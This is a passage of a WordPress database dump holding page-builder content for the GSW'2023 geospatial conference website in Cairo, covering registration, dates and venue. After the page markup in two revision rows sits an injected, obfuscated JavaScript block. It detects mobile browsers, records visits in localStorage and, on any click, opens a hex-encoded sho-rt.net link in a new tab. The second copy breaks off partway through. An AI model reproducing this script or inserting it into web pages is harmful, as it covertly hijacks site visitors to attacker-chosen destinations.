main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 20:19:59','2022-11-09 20:19:59','',3066,'https://gsw2023.com/?p=3212',0,'revision','',0),
(3213,1,'2022-11-09 20:21:33','2022-11-09 20:21:33','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h2 style=\"text-align: justify; color: #311b92;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]\r\n<h3></h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668024005657{margin-top: 25px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}\"]\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPAER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_align=\"left\" title_size=\"h3\" title_color=\"accent\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 